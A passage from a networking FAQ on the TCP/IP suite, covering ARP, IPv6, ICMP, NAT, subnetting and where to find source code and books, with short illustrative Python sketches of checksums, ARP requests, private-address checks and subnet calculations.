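        total += (data[i] << 8) | data[i + 1]   # add each 16-bit big-endian word
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)  # fold carries back in
    return ~total & 0xFFFF                   # one's complement of the sum


# A 20-byte IPv4 header with its checksum field (bytes 10-11) set to zero.
header = bytes.fromhex("450000730000400040110000c0a80001c0a800c7")
print(hex(internet_checksum(header)))
```

A receiver runs the same calculation over the header as received, checksum field included; a result of zero means the header passed the check.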
|
||||
4. What is ARP?
|
||||
|
||||
Address Resolution Protocol (ARP) is a mechanism that can be used
|
||||
by IP to find the link-layer station address that corresponds to a
|
||||
particular IP address. It defines a method that is used to ask,
|
||||
and answer, the question "what MAC address corresponds to a given
|
||||
IP address?". ARP sends broadcast frames to obtain this
|
||||
information dynamically, so it can only be used on media that
|
||||
support broadcast frames. Most LAN's (including Ethernet, FDDI,
|
||||
and Token Ring) have a broadcast capability and ARP is used when
|
||||
IP is running on those media. ARP is defined in RFC 826. That
|
||||
definition assumes an Ethernet LAN. Additional details for ARP on
|
||||
networks that use IEEE 802.2 frame formats (IEEE 802.3 CSMA/CD,
|
||||
IEEE 802.4, IEEE 802.5 Token Ring) are in RFC 1042. ARP on FDDI is
|
||||
described in RFC 1390.
|
||||
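To make the question-and-answer exchange more concrete, the following sketch builds the body of an ARP request for IPv4 over Ethernet, using the field layout from RFC 826. The function name and the example addresses are made up; actually transmitting the packet (inside a broadcast Ethernet frame) needs a raw socket and is not shown.

```python
import socket
import struct


def build_arp_request(sender_mac: bytes, sender_ip: str, target_ip: str) -> bytes:
    """Return the 28-byte ARP request asking who owns target_ip."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,                             # hardware type: Ethernet
        0x0800,                        # protocol type: IP
        6,                             # hardware address length
        4,                             # protocol address length
        1,                             # operation: request
        sender_mac,
        socket.inet_aton(sender_ip),
        bytes(6),                      # target MAC is unknown, left as zeroes
        socket.inet_aton(target_ip),
    )
```

The station that owns the target IP address answers with the same layout, operation 2, and its own MAC address filled in.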
|
||||
When IP is running over non-broadcast media (say, X.25 or ATM)
|
||||
some other mechanism is used to match IP addresses to media
|
||||
addresses. IP really doesn't care how the media address is
|
||||
obtained.
|
||||
|
||||
RFC 903 defines Reverse ARP (RARP) which lets a station ask the
|
||||
question "which IP address corresponds to a given MAC address?".
|
||||
RARP is typically used to let a piece of diskless equipment
|
||||
discover its own IP address as part of its boot procedure. RARP is
|
||||
rarely used by modern equipment; it has been supplanted by the
|
||||
Bootstrap Protocol (BOOTP), defined in RFC 951 and clarified in RFC 1542. BOOTP in turn is being
|
||||
supplanted by the Dynamic Host Configuration Protocol (DHCP).
|
||||
|
||||
5. What is IPv6?
|
||||
|
||||
IP Version 6 (IPv6) is the newest version of IP, sometimes called
|
||||
IPng for "IP, Next Generation". IPv6 is fairly well defined but is
|
||||
not yet widely deployed. The main differences between IPv6 and the
|
||||
current widely-deployed version of IP (which is IPv4) are:
|
||||
|
||||
o IPv6 uses larger addresses (128 bits instead of 32 bits in
|
||||
IPv4) and so can support many more devices on the network,
|
||||
and
|
||||
|
||||
o IPv6 includes features like authentication and multicasting
|
||||
that had been bolted on to IPv4 in a piecemeal fashion over
|
||||
the years.
|
||||
|
||||
Information on IPv6 can be found on the IPv6 home page at
|
||||
<http://playground.sun.com/pub/ipng/html/ipng-main.html>
|
||||
|
||||
6. What happened to IPv5?
|
||||
|
||||
Or, "Why are we skipping from IPv4 to IPv6?"
|
||||
|
||||
IPv5 never existed. The version number "5" in the IP header was
|
||||
assigned to identify packets carrying an experimental non-IP
|
||||
real-time stream protocol called ST. ST was never widely used, but
|
||||
since the version number 5 had already been allocated the new
|
||||
version of IP was given its own unique identifying number, 6. ST
|
||||
is described in RFC 1819.
|
||||
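The version number mentioned above occupies the top four bits of the first byte of the header, which is how a receiver tells IPv4, ST and IPv6 packets apart. A minimal sketch, with a hypothetical function name:

```python
def ip_version(packet: bytes) -> int:
    """Return the version number from the first byte of an IP-style header."""
    if not packet:
        raise ValueError("empty packet")
    return packet[0] >> 4   # the high nibble holds the version


print(ip_version(b"\x45"))  # first byte of a typical IPv4 header
```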
|
||||
7. What is the 6bone?
|
||||
|
||||
The 6bone is the experimental IPv6 backbone being developed using
|
||||
IPv6-in-IPv4 tunnels. This is intended for early experimentation
|
||||
with IPv6 and is not a production service.
|
||||
|
||||
8. What is the MBONE?
|
||||
|
||||
The Multicast backBONE (MBONE) is a multicast-capable portion of
|
||||
the Internet backbone. Multicast support over IP is provided by a
|
||||
protocol called IGMP (Internet Group Management Protocol) which is
|
||||
defined in RFC 1112. The MBONE is still a research prototype, but
|
||||
it extends through most of the core of the Internet (including
|
||||
North America, Europe, and Australia). It is typically used to
|
||||
relay multimedia (audio and low bandwidth video) presentations
|
||||
from a single source to multiple receiving sites dispersed over
|
||||
the Internet.
|
||||
|
||||
A slightly dated MBONE FAQ is available by anonymous FTP from
|
||||
<ftp://ftp.isi.edu/mbone/faq.txt>.
|
||||
|
||||
9. What is IPsec?
|
||||
|
||||
IPsec stands for "IP Security". The IPsec working group of the
|
||||
IETF is developing standards for cryptographic authentication and
|
||||
for encryption within IP. The base specifications are defined in
|
||||
RFC's 1825, 1826 and 1827. Products that implement these are
|
||||
beginning to appear.
|
||||
|
||||
A freely distributable implementation of IPsec for IPv4 and IPsec
|
||||
for IPv6 is included in the NRL IPv6/IPsec distribution for
|
||||
4.4-Lite BSD. The NRL software is available from
|
||||
<http://web.mit.edu/network/isakmp/> (for distribution within the
|
||||
US only), from
|
||||
<http://www.cisco.com/public/library/isakmp/ipsec.html> (for
|
||||
distribution within the US and Canada), and from
|
||||
<ftp://ftp.ripe.net/ipv6/nrl/> (for unrestricted distribution).
|
||||
|
||||
(Some countries consider encryption software to have military
|
||||
significance and so restrict the export and import of such
|
||||
software, which is why there are geographical restrictions on the
|
||||
areas served by the above sites.)
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About TCP
|
||||
|
||||
1. What is TCP?
|
||||
|
||||
Transmission Control Protocol (TCP) provides a reliable
|
||||
byte-stream transfer service between two endpoints on an internet.
|
||||
TCP depends on IP to move packets around the network on its
|
||||
behalf. IP is inherently unreliable, so TCP protects against data
|
||||
loss, data corruption, packet reordering and data duplication by
|
||||
adding checksums and sequence numbers to transmitted data and, on
|
||||
the receiving side, sending back packets that acknowledge the
|
||||
receipt of data.
|
||||
|
||||
Before sending data across the network, TCP establishes a
|
||||
connection with the destination via an exchange of management
|
||||
packets. The connection is destroyed, again via an exchange of
|
||||
management packets, when the application that was using TCP
|
||||
indicates that no more data will be transferred. In OSI terms, TCP
|
||||
is a Connection-Oriented Acknowledged Transport protocol.
|
||||
|
||||
TCP has a multi-stage flow-control mechanism which continuously
|
||||
adjusts the sender's data rate in an attempt to achieve maximum
|
||||
data throughput while avoiding congestion and subsequent packet
|
||||
losses in the network. It also attempts to make the best use of
|
||||
network resources by packing as much data as possible into a
|
||||
single IP packet, although this behaviour can be overridden by
|
||||
applications that demand immediate data transfer and don't care
|
||||
about the inefficiencies of small network packets.
|
||||
|
||||
The fundamentals of TCP are defined in RFC 793, and later RFC's
|
||||
refine the protocol. RFC 1122 catalogues these refinements as of
|
||||
October 1989 and summarises the requirements that a TCP
|
||||
implementation must meet.
|
||||
|
||||
TCP is still being developed. For instance, RFC 1323 introduces a
|
||||
TCP option that can be useful when traffic is being carried over
|
||||
high-capacity links. It is important that such developments are
|
||||
backwards-compatible. That is, a TCP implementation that supports
|
||||
a new feature must continue to work with older TCP implementations
|
||||
that do not support that feature.
|
||||
|
||||
2. How does TCP try to avoid network meltdown?
|
||||
|
||||
TCP includes several mechanisms that attempt to sustain good data
|
||||
transfer rates while avoiding placing excessive load on the
|
||||
network. TCP's "Slow Start", "Congestion Avoidance", "Fast
|
||||
Retransmit" and "Fast Recovery" algorithms are summarised in RFC
|
||||
2001. TCP also mandates an algorithm that avoids "Silly Window
|
||||
Syndrome" (SWS), an undesirable condition that results in very
|
||||
small chunks of data being transferred between sender and
|
||||
receiver. SWS Avoidance is discussed in RFC 813. The "Nagle
|
||||
Algorithm", which prevents the sending side of TCP from flooding
|
||||
the network with a train of small frames, is described in RFC
|
||||
896.
|
||||
|
||||
Van Jacobson has done significant work on this aspect of TCP's
|
||||
behaviour. The FAQ used to contain a couple of pieces of
|
||||
historically interesting email from Van concerning an early
|
||||
implementation of congestion avoidance, but in the interests of
|
||||
saving space they've been removed and can instead be obtained by
|
||||
anonymous FTP from the end-to-end mailing list archive at
|
||||
<ftp://ftp.isi.edu/end2end/end2end-1990.mail>. PostScript slides
|
||||
of a presentation on this implementation of congestion avoidance
|
||||
can be obtained by anonymous FTP from
|
||||
<ftp://ftp.ee.lbl.gov/papers/congavoid.ps.Z>.
|
||||
|
||||
That directory contains several other interesting TCP-related
|
||||
papers, including one
|
||||
(<ftp://ftp.ee.lbl.gov/papers/fastretrans.ps>) by Sally Floyd that
|
||||
discusses an algorithm that attempts to give TCP the ability to
|
||||
recover quickly from packet loss in a network.
|
||||
|
||||
3. How do applications coexist over TCP and UDP?
|
||||
|
||||
Each application running over TCP or UDP distinguishes itself from
|
||||
other applications using the service by reserving and using a
|
||||
16-bit port number. Destination and source port numbers are placed
|
||||
in the UDP and TCP headers by the originator of the packet before
|
||||
it is given to IP, and the destination port number allows the
|
||||
packet to be delivered to the intended recipient at the
|
||||
destination system.
|
||||
|
||||
So, a system may have a Telnet server listening for packets on TCP
|
||||
port 23 while an FTP server listens for packets on TCP port 21 and
|
||||
a DNS server listens for packets on port 53. TCP examines the port
|
||||
number in each received frame and uses it to figure out which
|
||||
server gets the data. UDP has its own similar set of port
|
||||
numbers.
|
||||
|
||||
Many servers, like the ones in this example, always listen on the
|
||||
same well-known port number. The actual port number is arbitrary,
|
||||
but is fixed by tradition and by an official allocation or
|
||||
"assignment" of the number by the Internet Assigned Numbers
|
||||
Authority (IANA).
|
||||
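The port-based delivery described in this answer can be illustrated with a toy dispatcher. Both the TCP and UDP headers begin with a 16-bit source port followed by a 16-bit destination port, so the same parsing works for either. The LISTENERS table and the function names are hypothetical stand-ins for whatever a real protocol stack keeps internally.

```python
import struct

# Hypothetical table of servers listening on well-known TCP ports.
LISTENERS = {21: "ftp", 23: "telnet", 53: "dns"}


def ports(transport_header: bytes):
    """Return (source_port, destination_port) from a TCP or UDP header."""
    if len(transport_header) < 4:
        raise ValueError("header too short to contain port numbers")
    src, dst = struct.unpack("!HH", transport_header[:4])
    return src, dst


def deliver(transport_header: bytes):
    """Name the listener that should receive this packet, or None."""
    _, dst = ports(transport_header)
    return LISTENERS.get(dst)
```

A packet addressed to a port with no listener yields None here; what a real stack does in that case is outside the scope of this sketch.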
|
||||
4. Where do I find assigned port numbers?
|
||||
|
||||
The IANA allocates and keeps track of all kinds of arbitrary
|
||||
numbers used by TCP/IP, including well-known port numbers. The
|
||||
entire collection is published periodically in an RFC called the
|
||||
Assigned Numbers RFC, each of which supersedes the previous one in
|
||||
the series. The current Assigned Numbers RFC is RFC 1700.
|
||||
|
||||
The Assigned Numbers document can also be obtained directly by FTP
|
||||
from the IANA at <ftp://ftp.isi.edu/in-notes/iana/assignments>.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About UDP
|
||||
|
||||
1. What is UDP?
|
||||
|
||||
User Datagram Protocol (UDP) provides an unreliable packetized
|
||||
data transfer service between endpoints on an internet. UDP
|
||||
depends on IP to move packets around the network on its behalf.
|
||||
|
||||
UDP does not guarantee to actually deliver the data to the
|
||||
destination, nor does it guarantee that data packets will be
|
||||
delivered to the destination in the order in which they were sent
|
||||
by the source, nor does it guarantee that only one copy of the
|
||||
data will be delivered to the destination. UDP does guarantee data
|
||||
integrity, and it does this by adding a checksum to the data
|
||||
before transmission. (Some machines run with UDP checksum
|
||||
generation disabled, in which case data corruption or truncation
|
||||
can go undetected. Very few people think this is a good idea.)
|
||||
|
||||
The fundamentals of UDP are defined in RFC 768. RFC 1122
|
||||
summarises the requirements that a UDP implementation must meet.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About ICMP
|
||||
|
||||
1. What is ICMP?
|
||||
|
||||
Internet Control Message Protocol (ICMP) defines a small number of
|
||||
messages used for diagnostic and management purposes. ICMP depends
|
||||
on IP to move packets around the network on its behalf.
|
||||
|
||||
The fundamentals of ICMP are defined in RFC 792. RFC 1122
|
||||
summarises the requirements that must be met by an ICMP
|
||||
implementation in an Internet host, and RFC 1812 summarises the
|
||||
ICMP requirements for an Internet router.
|
||||
|
||||
ICMP is basically IP's internal network management protocol and is
|
||||
not intended for use by applications. Two well known exceptions
|
||||
are the ping and traceroute diagnostic utilities:
|
||||
|
||||
o ping sends and receives ICMP "ECHO" packets, where the
|
||||
response packet can be taken as evidence that the target host
|
||||
is at least minimally active on the network, and
|
||||
|
||||
o traceroute sends UDP packets and infers the route taken to
|
||||
the target from ICMP "TIME-TO-LIVE EXCEEDED" or "PORT
|
||||
UNREACHABLE" packets returned by the network. (Microsoft's
|
||||
TRACERT sends ICMP "ECHO" packets rather than UDP packets,
|
||||
and so receives ICMP "TIME-TO-LIVE EXCEEDED" or "ECHO
|
||||
RESPONSE" packets in return.)
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
TCP/IP Network Operations
|
||||
|
||||
1. How can I measure the performance of an IP link?
|
||||
|
||||
You can get a quick approximation by timing how long it takes to
|
||||
FTP or RCP a large file over the link, but bear in mind that that
|
||||
measurement will be skewed by the time spent in dealing with the
|
||||
local and remote filesystems, not simply with the network itself.
|
||||
And remember to measure the time it takes to receive a file, not
|
||||
the time it takes to send it; the sender can report completion
|
||||
even though large amounts of data are still buffered locally by
|
||||
TCP and have not yet been delivered to the destination.
|
||||
|
||||
Two well-known open-source programs that measure and report
|
||||
throughput over an IP link without involving the filesystem are:
|
||||
|
||||
o TTCP, available for anonymous ftp from the Silicon Graphics
|
||||
FTP archive at <ftp://ftp.sgi.com/sgi/src/ttcp/>.
|
||||
|
||||
o Rick Jones' NETPERF, available on the Web at
|
||||
<http://www.cup.hp.com/netperf/NetperfPage.html>.
|
||||
|
||||
If neither of those tools does what you want then you might find
|
||||
something that meets your needs in CAIDA's measurement tools list
|
||||
at <http://www.caida.org/Tools/meastools.html>.
|
||||
|
||||
2. What IP addresses should I assign to machines on a private
|
||||
internet?
|
||||
|
||||
You shouldn't use IP addresses that have been assigned to some
|
||||
other organisation, because if knowledge of your network ever gets
|
||||
leaked onto the Internet they may disrupt that innocent
|
||||
organisation's activity. RFC 1918 provides a solution for this
|
||||
problem by allocating several IP address ranges specifically for
|
||||
use on private networks. These addresses will never be assigned
|
||||
to any organisation and are never supposed to appear on the
|
||||
Internet. The ranges are:
|
||||
|
||||
Class A: 10.0.0.0 through 10.255.255.255
|
||||
Class B: 172.16.0.0 through 172.31.255.255
|
||||
Class C: 192.168.0.0 through 192.168.255.255
|
||||
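If you need to check whether a given address falls inside one of these ranges, Python's standard ipaddress module makes it a short exercise. The sketch below writes the three ranges in prefix notation (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16, which cover exactly the ranges listed above); the function name is an assumption of this example.

```python
import ipaddress

# The three RFC 1918 ranges, written in prefix notation.
PRIVATE_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def is_rfc1918(address: str) -> bool:
    """True if address lies in one of the RFC 1918 private ranges."""
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in PRIVATE_NETS)
```

A check like this is handy in a border filter that should never let such addresses leak onto the Internet.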
|
||||
|
||||
3. Can I set up a gateway to the Internet that translates IP
|
||||
addresses, so that I don't have to change all our internal
|
||||
addresses to an official network?
|
||||
|
||||
This is called Network Address Translation, or NAT. In general it
|
||||
is a difficult thing to do properly because many applications
|
||||
embed IP addresses in the application-level data (FTP's "PORT"
|
||||
command is a notable example) so NAT isn't simply a matter of
|
||||
translating addresses in the IP header and recalculating header
|
||||
checksums. Also, if the network number(s) you're using match those
|
||||
assigned to another organisation, your gateway may not be able to
|
||||
communicate with that organisation. As noted above, RFC 1918
|
||||
proposes network numbers that are reserved for private use, to
|
||||
avoid such conflicts, but if you're already using a different
|
||||
network number this won't help you.
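
The "easy" half of the job described above, rewriting an address in
the IP header and recalculating the header checksum, can be sketched
in Python as follows. The header layout is the standard 20-byte IPv4
header without options; the function names and the sample addresses
are assumptions made for this illustration, and nothing here touches
addresses embedded in application data.

```python
import socket
import struct

IPV4_HEADER = "!BBHHHBBH4s4s"   # 20-byte IPv4 header without options


def internet_checksum(data):
    """Ones'-complement sum over 16-bit words, as used by the IP header."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_header(src, dst, payload_len=0):
    """Build a minimal IPv4 header carrying a valid checksum."""
    fields = [0x45, 0, 20 + payload_len, 0, 0, 64, socket.IPPROTO_TCP, 0,
              socket.inet_aton(src), socket.inet_aton(dst)]
    fields[7] = internet_checksum(struct.pack(IPV4_HEADER, *fields))
    return struct.pack(IPV4_HEADER, *fields)


def translate_source(header, new_src):
    """Rewrite the source address and recompute the header checksum."""
    fields = list(struct.unpack(IPV4_HEADER, header))
    fields[8] = socket.inet_aton(new_src)
    fields[7] = 0                            # checksum field is zero while summing
    fields[7] = internet_checksum(struct.pack(IPV4_HEADER, *fields))
    return struct.pack(IPV4_HEADER, *fields)
```

A header with a correct checksum sums to zero when passed back
through internet_checksum(), which gives a quick self-check after
translation.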
|
||||
|
||||
However, there are several products that do attempt to provide
|
||||
this kind of on-the-fly NAT. Linux provides NAT through its "IP
|
||||
Masquerading" feature, and many firewall and router vendors offer
|
||||
NAT capabilities in their products -- look for "Network Address
|
||||
Translation" in your favourite Web search engine to get a list of
|
||||
vendors. Proxy servers developed for firewalls can also sometimes
|
||||
be used as a substitute for an address-translating gateway for
|
||||
particular application protocols. This is discussed in more detail
|
||||
in the FAQ for the comp.security.firewalls newsgroup. That FAQ can
|
||||
be viewed on the Web at <http://www.clark.net/pub/mjr/pubs/fwfaq/>.
|
||||
|
||||
4. Can I use a single bit subnet?
|
||||
|
||||
The answer used to be a straightforward "no", because a 1-bit
|
||||
subnet can only have a subnet part of all-ones or all-zeroes, both
|
||||
of which were assigned special meanings when the subnetting
|
||||
concept was originally defined. (All-ones meant "broadcast, all
|
||||
subnets of this net" and all-zeroes meant "this subnet, regardless
|
||||
of its actual subnet number".)
|
||||
|
||||
However, the old definition of subnetting has been superseded by
|
||||
the concept of Classless Inter-Domain Routing (CIDR, pronounced
|
||||
'cider'). Under CIDR the subnet doesn't really have an existence
|
||||
of its own and the subnet mask simply provides the mechanism for
|
||||
isolating an arbitrarily-sized network portion of an IP address
|
||||
from the remaining host part. As CIDR-aware equipment is deployed
|
||||
it becomes increasingly likely that you will be able to use a 1-bit
|
||||
subnet with at least some particular combinations of networking
|
||||
equipment. However, it's still not safe to assume that a 1-bit
|
||||
subnet will work properly with all kinds of equipment.
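
To make the all-zeroes and all-ones cases concrete, here is a short
Python sketch that splits a network with a single subnet bit. The
network 192.0.2.0/24 used in the note below is a documentation
address chosen for the example, and one_bit_subnets is a made-up
helper name.

```python
import ipaddress


def one_bit_subnets(network):
    """Split a network in two by using a single bit for the subnet part."""
    net = ipaddress.ip_network(network)
    halves = list(net.subnets(prefixlen_diff=1))
    shift = 32 - halves[0].prefixlen         # position of the single subnet bit
    return [
        (str(half), str(half.netmask), (int(half.network_address) >> shift) & 1)
        for half in halves
    ]
```

Calling one_bit_subnets("192.0.2.0/24") yields the two halves
192.0.2.0/25 and 192.0.2.128/25, whose subnet bits are 0 and 1; those
are exactly the all-zeroes and all-ones subnet parts discussed above.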
|
||||
|
||||
As Steinar Haug explains:
|
||||
|
||||
From RFC 1122:
|
||||
|
||||
> 3.3.6 Broadcasts
|
||||
>
|
||||
> Section 3.2.1.3 defined the four standard IP broadcast address
|
||||
> forms:
|
||||
> Limited Broadcast: {-1, -1}
|
||||
> Directed Broadcast: {<Network-number>, -1}
|
||||
> Subnet Directed Broadcast: {<Network-number>, <Subnet-number>, -1}
|
||||
> All-Subnets Directed Broadcast: {<Network-number>, -1, -1}
|
||||
|
||||
All-Subnets Directed broadcasts are being deprecated in favor of IP
|
||||
multicast, but were very much defined at the time RFC1122 was written.
|
||||
Thus a Subnet Directed Broadcast to a subnet of all ones is not
|
||||
distinguishable from an All-Subnets Directed Broadcast.
|
||||
|
||||
For those old systems that used all zeros for broadcast in IP
|
||||
addresses, a similar argument can be made against the subnet of all
|
||||
zeros.
|
||||
|
||||
Also, for old routing protocols like RIP, a route to subnet zero is not
|
||||
distinguishable from the route to the entire network number (except
|
||||
possibly by context).
|
||||
|
||||
Most of today's systems don't support variable length subnet masks
|
||||
(VLSM), and for such systems the above is true. However, all the major
|
||||
router vendors and *some* Unix systems (BSD 4.4 based ones) support
|
||||
VLSMs, and in that case the situation is more complicated :-)
|
||||
|
||||
With VLSMs (necessary to support CIDR, see RFC 1519), you can utilize
|
||||
the address space more efficiently. Routing lookups are based on
|
||||
*longest* match, and this means that you can for instance subnet the
|
||||
class C net with a mask of 255.255.255.224 (27 bits) in addition to the
|
||||
subnet mask of 255.255.255.192 (26 bits) given above. You will then be
|
||||
able to use the addresses x.x.x.33 through x.x.x.62 (first three bits
|
||||
001) and the addresses x.x.x.193 through x.x.x.222 (first three bits
|
||||
110) with this new subnet mask. And you can continue with a subnet mask
|
||||
of 28 bits, etc. (Note also, by the way, that non-contiguous subnet
|
||||
masks are deprecated.)
|
||||
|
||||
This is all very nicely covered in the paper by Havard Eidnes:
|
||||
|
||||
Practical Considerations for Network Address using a
|
||||
CIDR Block Allocation
|
||||
Proceedings of INET '93
|
||||
|
||||
This paper is available with anonymous FTP from
|
||||
aun.uninett.no:pub/misc/eidnes-cidr.ps.
|
||||
|
||||
The same paper, with minor revisions, is one of the articles in the
|
||||
special Internetworking issue of Communications of the ACM (last month,
|
||||
I believe).
|
||||
|
||||
Steinar Haug, SINTEF RUNIT, University of Trondheim, NORWAY
|
||||
Email: Steinar.Haug@runit.sintef.no
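
The address ranges and the longest-match rule in the quoted
explanation can be checked with a few lines of Python. The prefix
192.0.2.0/24 stands in for the "x.x.x" class C net and is an
assumption of this example, as are the helper names.

```python
import ipaddress


def host_range(network):
    """Return the first and last usable host address of a subnet."""
    hosts = list(ipaddress.ip_network(network).hosts())
    return str(hosts[0]), str(hosts[-1])


def longest_match(destination, routes):
    """Pick the matching route with the longest prefix, or None."""
    dest = ipaddress.ip_address(destination)
    matching = [n for n in map(ipaddress.ip_network, routes) if dest in n]
    if not matching:
        return None
    return str(max(matching, key=lambda n: n.prefixlen))
```

With a 27-bit mask, host_range("192.0.2.32/27") gives .33 through .62
and host_range("192.0.2.192/27") gives .193 through .222, the same
ranges quoted above.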
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
TCP/IP Protocol Implementations
|
||||
|
||||
1. Where can I find TCP/IP source code?
|
||||
|
||||
Code used in the venerable Net-2 version of Berkeley Unix is
|
||||
available by anonymous FTP from
|
||||
<ftp://ftp.uu.net/systems/unix/bsd-sources/sys/netinet> (at UUNet
|
||||
in Virginia, US) and
|
||||
<ftp://gatekeeper.dec.com/pub/BSD/net2/sys/> (at Compaq in
|
||||
California, US).
|
||||
|
||||
Source code for the TCP/IP implementations in the current dialects
|
||||
of BSD Unix is available. Instructions on how to access the
|
||||
sources through FTP and other methods are detailed on their
|
||||
respective websites: FreeBSD at <http://www.freebsd.org/>; NetBSD
|
||||
at <http://www.netbsd.org/>; and OpenBSD at
|
||||
<http://www.openbsd.org/>.
|
||||
|
||||
Source for the Unix-like Linux operating system is at
|
||||
<http://www.kernel.org/pub/linux/>.
|
||||
|
||||
Source for the TCP/IP implementation of the Xinu operating system
|
||||
discussed in Comer & D. L. Stevens' "Internetworking with TCP/IP
|
||||
Volume II" is at <ftp://ftp.cs.purdue.edu/pub/Xinu/>.
|
||||
|
||||
WATTCP is a DOS TCP/IP stack derived from the NCSA Telnet program
|
||||
and much enhanced. It is available from many DOS software archive
|
||||
sites as WATTCP.ZIP. This file includes some example programs and
|
||||
complete source code. The interface isn't BSD sockets but is well
|
||||
suited to PC type work.
|
||||
|
||||
KA9Q is Phil Karn's network operating system for PC's. It includes
|
||||
a TCP/IP implementation originally developed for use over packet
|
||||
radio. Source is available from Phil's website at
|
||||
<http://people.qualcomm.com/karn/code/ka9qos/>.
|
||||
|
||||
2. Where can I find TCP/IP application source code?
|
||||
|
||||
Source code for the various TCP/IP applications delivered with the
|
||||
current BSD Unix flavours is available through the FreeBSD, NetBSD
|
||||
and OpenBSD websites noted in the previous section.
|
||||
|
||||
Linux application source is at <http://www.kernel.org/pub/linux/>.
|
||||
Much of the application source used by Linux was originally
|
||||
developed by the GNU Project whose website is at
|
||||
<http://www.gnu.org/>.
|
||||
|
||||
Code from Comer & D. L. Stevens' "Internetworking with TCP/IP
|
||||
Volume III" is available by anonymous FTP from
|
||||
<ftp://ftp.cs.purdue.edu/pub/dls/>.
|
||||
|
||||
Code from W. R. Stevens' "TCP/IP Illustrated, Volume 1" is
|
||||
available from
|
||||
<ftp://ftp.uu.net/published/books/stevens.tcpipiv1.tar.Z>.
|
||||
|
||||
Source code for some well-known cross-system TCP/IP applications
|
||||
(BIND, sendmail, Apache and so on) is available from the various
|
||||
organisations that sponsor the applications. See Part 2 of the FAQ
|
||||
for details.
|
||||
|
||||
3. Where can I find IPv6 source code?
|
||||
|
||||
There are several freely distributable implementations of IPv6,
|
||||
particularly for BSD and Linux. You can find detailed information at
|
||||
<http://playground.sun.com/pub/ipng/html/ipng-implementations.html>,
|
||||
part of the IPv6 home site mentioned above.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Further Sources of Information
|
||||
|
||||
1. TCP/IP-related newsgroups and FAQ lists
|
||||
|
||||
Collections of newsgroup FAQ documents are archived at many
|
||||
locations including <http://www.faqs.org/> and
|
||||
<ftp://rtfm.mit.edu/pub/faqs/>. The following newsgroups are
|
||||
particularly relevant to TCP/IP:
|
||||
|
||||
comp.protocols.tcp-ip covers all of the TCP/IP suite.
|
||||
|
||||
comp.protocols.dns.bind covers the BIND suite, which contains
|
||||
server and client implementations of DNS.
|
||||
|
||||
comp.protocols.tcp-ip.domains discusses DNS global
|
||||
administration and politics.
|
||||
|
||||
comp.protocols.nfs covers NFS protocol, implementation, and
|
||||
administration.
|
||||
|
||||
comp.protocols.snmp covers SNMP definition, implementation,
|
||||
and administration.
|
||||
|
||||
comp.protocols.time.ntp covers NTP definition,
|
||||
implementation, and administration.
|
||||
|
||||
comp.protocols.tcp-ip.ibmpc discusses TCP/IP for IBM(-like)
|
||||
personal computers. The group's FAQ is available at
|
||||
<ftp://ftp.netcom.com/pub/ma/mailcom/IBMTCP/>.
|
||||
|
||||
comp.os.ms-windows.networking.tcp-ip discusses TCP/IP on
|
||||
Microsoft Windows machines.
|
||||
|
||||
comp.os.ms-windows.programmer.tools.winsock covers the
|
||||
Winsock sockets API on Microsoft Windows machines. The
|
||||
group's FAQ is available at
|
||||
<http://www.cyberport.com/~tangent/programming/winsock/>.
|
||||
|
||||
comp.os.os2.networking.tcp-ip discusses TCP/IP on OS/2.
|
||||
|
||||
comp.dcom.lans.ethernet covers Ethernet and IEEE 802.3 LAN's.
|
||||
The group's FAQ is available at
|
||||
<ftp://dorm.rutgers.edu/pub/novell/info_and_docs/Ethernet.FAQ>.
|
||||
|
||||
comp.dcom.lans.fddi covers FDDI LAN's.
|
||||
|
||||
comp.dcom.lans.token-ring covers IBM Token Ring and IEEE
|
||||
802.5 LAN's.
|
||||
|
||||
comp.dcom.lans.misc covers all other types of LAN.
|
||||
|
||||
comp.protocols.ppp covers PPP and SLIP. The group's FAQ is
|
||||
available at <http://cs.uni-bonn.de/ppp/part1.html>.
|
||||
|
||||
comp.dcom.sys.cisco discusses cisco products.
|
||||
|
||||
comp.dcom.sys.wellfleet discusses Wellfleet (now Bay
|
||||
Networks) products.
|
||||
|
||||
2. Are there any good books on TCP/IP?
|
||||
|
||||
Yes, lots of them, far too many to list here. Uri Raz maintains a
|
||||
TCP/IP bibliography (the "TCP/IP Resources List") that is posted
|
||||
to the comp.protocols.tcp-ip newsgroup on a monthly basis. It is
|
||||
available on the Web at
|
||||
<http://www.qnx.com/%7Emphunter/tcpip_resources.html> and
|
||||
<http://www.faqs.org/faqs/internet/tcp-ip/resource-list/index.html>
|
||||
or can be retrieved by anonymous FTP from
|
||||
<ftp://rtfm.mit.edu/pub/usenet-by-hierarchy/comp/protocols/tcp-ip/>.
|
||||
|
||||
However, a couple of books that always head the list of
|
||||
recommended reading are:
|
||||
|
||||
"Internetworking with TCP/IP Volume I (Principles, Protocols,
|
||||
and Architecture)" by Douglas E. Comer, published by Prentice
|
||||
Hall, 1991 (ISBN 0-13-468505-9). This is an introductory book
|
||||
which covers all of the fundamental protocols, including IP,
|
||||
UDP, TCP, and the gateway protocols. It also discusses some
|
||||
higher level protocols such as FTP, Telnet, and NFS.
|
||||
|
||||
"TCP/IP Illustrated, Volume 1: The Protocols" by W. Richard
|
||||
Stevens, published by Addison-Wesley, 1994 (ISBN
|
||||
0-201-63346-9). This book explains the TCP/IP protocols and
|
||||
several application protocols in exquisite detail. It
|
||||
contains many real-life traces of the protocols in action,
|
||||
